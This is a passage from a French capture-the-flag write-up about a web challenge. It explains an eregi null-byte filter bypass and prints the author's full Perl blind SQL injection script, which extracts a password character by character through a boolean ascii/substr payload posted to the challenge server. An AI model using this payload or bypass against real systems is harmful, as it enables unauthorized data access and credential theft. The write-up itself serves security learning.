Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">$_POST</span><span class="br0" style="color: #009900; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">[</span><span class="st_h" style="color: blue; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">'password'</span><span class="br0" style="color: #009900; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">]</span><span class="br0" style="color: #009900; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px;">)</span><br />
à première vue RAS et pourtant.. la page du manuel php indique qu'elle n'est pas case sensitive ... ok mais juste en dessous on peux y lire un gros WARNING nous indiquant qu'elle est deprecated depuis php 5.3.0 et qu'il est recommandé de ne pas l'employer!<br />
Une simple recherche et on tombe sur la liste dediffusion de PHP et au bun #44366 que voit-on ?<br />
Qu'eregi se bypass avec un simple Null Byte poisoning! \o/<br />
<br />
<br />
3-<u>Exploitation</u>:<br />
Une fois ces informations récupérées on peux alors commencer à travailler notre SQLi et trés vite nous récupérions des résultats notamment grâce à un script fait à l'arrache par l'ami korigan (je ne donnerai pas le code ici ne lui en ayant pas parlé pi il serait pas fier je pense :P).<br />
<br />
Ensuite chacun (on s'est retrouvé à 3 sur ce challenge) y aura été de son propre exploit : bash , python, perl ..<br />
Forcément ce blog étant miens je ne posterais que mon code mais je précise que sa vue peux choquer: ce coup ci je n'ai pas fait le ménage et il sera tel qu'il était lors du ctf !<br />
Bref, le disclaimer fait continuons!<br />
<br />
les premiers essais démontrait clairement que bien trop de requests étaient faites et donc impossible d'espérer s'authentifier grâce à ce sploit:<br />
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#!/usr/bin/perl -Uw</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> 5<span class="sy0" style="color: #339933;">.</span>0<span class="sy0" style="color: #339933;">.</span>10<span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> Encode<span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> IO<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">File</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> URL<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Encode</span> <span class="kw3" style="color: #000066;">qw</span><span class="br0" style="color: #009900;">(</span>url_decode_utf8 url_encode_utf8<span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> Data<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Dumper</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> HTTP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Cookies</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">use</span> LWP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">UserAgent</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">BEGIN</span><span class="sy0" style="color: #339933;">:</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#Filtrage en place:</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;"># "replace|load|information|union|select|from|where|limit|offset|order|by|ip|\.|#|-|/|\*"</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">## si besoin d'un biscuit...</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$cookie_jar</span> <span class="sy0" style="color: #339933;">=</span> HTTP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">Cookies</span><span class="sy0" style="color: #339933;">-></span><span class="kw2" style="font-weight: bold;">new</span><span class="br0" style="color: #009900;">(</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
file <span class="sy0" style="color: #339933;">=></span> <span class="st0" style="color: red;">"cookies.txt"</span><span class="sy0" style="color: #339933;">,</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$UserAgent</span> <span class="sy0" style="color: #339933;">=</span> LWP<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="kw2" style="font-weight: bold;">new</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">cookie_jar</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$cookie_jar</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">## Get Password:</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$Arg</span><span class="sy0" style="color: #339933;">=</span><span class="nu0" style="color: #cc66cc;">1</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$Flag</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">for</span> <span class="br0" style="color: #009900;">(</span><span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$i</span><span class="sy0" style="color: #339933;">=</span><span class="nu0" style="color: #cc66cc;">32</span><span class="sy0" style="color: #339933;">;</span><span class="re0" style="color: blue;">$i</span> <span class="sy0" style="color: #339933;"><=</span><span class="nu0" style="color: #cc66cc;">126</span><span class="sy0" style="color: #339933;">;</span><span class="re0" style="color: blue;">$i</span><span class="sy0" style="color: #339933;">++</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span> <span class="sy0" style="color: #339933;">//</span> englobe min<span class="sy0" style="color: #339933;">,</span> specials char<span class="sy0" style="color: #339933;">,</span> MAJ<span class="sy0" style="color: #339933;">,</span> number</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$getpass</span> <span class="sy0" style="color: #339933;">=</span> url_decode_utf8<span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"'or if(ascii(substr(password,$Arg,1))=$i,1,0) or '0-- -"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="co1" style="color: #666666; font-style: italic;">#print("[*]Trying post data: $getpass\n");</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">=</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"http://58.229.183.24/5a520b6b783866fd93f9dcdaf753af08/index.php"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$response</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$UserAgent</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">post</span><span class="br0" style="color: #009900;">(</span> <span class="re0" style="color: blue;">$Url</span><span class="sy0" style="color: #339933;">,</span> <span class="br0" style="color: #009900;">{</span> <span class="st_h" style="color: red;">'password'</span> <span class="sy0" style="color: #339933;">=></span> <span class="re0" style="color: blue;">$getpass</span> <span class="br0" style="color: #009900;">}</span> <span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=</span> <span class="re0" style="color: blue;">$response</span><span class="sy0" style="color: #339933;">-></span><span class="me1" style="color: #006600;">decoded_content</span><span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$content</span> <span class="sy0" style="color: #339933;">=~</span> <span class="co2" style="color: #009966; font-style: italic;">/True/i</span><span class="br0" style="color: #009900;">)</span><span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$found</span><span class="sy0" style="color: #339933;">=</span><span class="kw3" style="color: #000066;">chr</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: blue;">$i</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$Flag</span><span class="sy0" style="color: #339933;">.=</span><span class="re0" style="color: blue;">$found</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #000066;">print</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"[*]FLAG: $Flag<span class="es0" style="color: #000099; font-weight: bold;">\n</span>"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$Arg</span><span class="sy0" style="color: #339933;">+=</span><span class="nu0" style="color: #cc66cc;">1</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$i</span><span class="sy0" style="color: #339933;">=</span><span class="nu0" style="color: #cc66cc;">32</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
</div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">my</span> <span class="re0" style="color: blue;">$fh</span> <span class="sy0" style="color: #339933;">=</span> IO<span class="sy0" style="color: #339933;">::</span><span class="me2" style="color: #006600;">File</span><span class="sy0" style="color: #339933;">-></span><span class="kw2" style="font-weight: bold;">new</span><span class="br0" style="color: #009900;">(</span><span class="st0" style="color: red;">"> WEB500_data"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw1" style="color: #b1b100;">if</span> <span class="br0" style="color: #009900;">(</span><span class="kw3" style="color: #000066;">defined</span> <span class="re0" style="color: blue;">$fh</span><span class="br0" style="color: #009900;">)</span> <span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw3" style="color: #000066;">print</span> <span class="re0" style="color: blue;">$fh</span> <span class="re0" style="color: blue;">$Flag</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: blue;">$fh</span><span class="sy0" style="color: #339933;">-></span><span class="kw3" style="color: #000066;">close</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">}</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<br /></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">__END__</span></div>
</li>
</ol>
<br />
<br />
En effet, hors mis la saleté (j'avais prévenu) on comprend vite que le scope testé est trop grand et surtout qu'un peu de dichotomie ferait sûrement gagner en perf !<br />
<br />
Concernant le scope j'ai eu l'idée de relire le code et .. OMG!<br />
Je pouvait déja bien le réduire (en gardant les specials chars même si j'avais de gros doute sur le fait qu'ils soient présents dans le pass auquel cas on aurait pu relancer le script afin d'avoir un script full lower-case mais bon).<br />
La fonction de génération du pass était explicite:<br />
<br />
<ol style="background-color: #f8f8f8; color: #acacac; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', monospace, serif; font-size: 12px; line-height: 21px; margin: 0px; padding: 0px 0px 0px 48px;">
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="kw2" style="font-weight: bold;">function</span> RandomString<span class="br0" style="color: #009900;">(</span><span class="br0" style="color: #009900;">)</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="br0" style="color: #009900;">{</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$filename</span> <span class="sy0" style="color: #339933;">=</span> <span class="st0" style="color: blue;">"smash.txt"</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$f</span> <span class="sy0" style="color: #339933;">=</span> <span class="kw3" style="color: #990000;">fopen</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$filename</span><span class="sy0" style="color: #339933;">,</span> <span class="st0" style="color: blue;">"r"</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li1" style="-webkit-user-select: none;"><div class="de1" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$len</span> <span class="sy0" style="color: #339933;">=</span> <span class="kw3" style="color: #990000;">filesize</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$filename</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
<li class="li2" style="-webkit-user-select: none;"><div class="de2" style="-webkit-user-select: text; background-color: white; border-left-color: rgb(204, 204, 204); border-left-style: solid; border-left-width: 1px; color: black; margin: 0px 0px 0px -7px; padding: 0px 5px; position: relative; vertical-align: top;">
<span class="re0" style="color: #000088;">$contents</span> <span class="sy0" style="color: #339933;">=</span> <span class="kw3" style="color: #990000;">fread</span><span class="br0" style="color: #009900;">(</span><span class="re0" style="color: #000088;">$f</span><span class="sy0" style="color: #339933;">,</span> <span class="re0" style="color: #000088;">$len</span><span class="br0" style="color: #009900;">)</span><span class="sy0" style="color: #339933;">;</span></div>
</li>
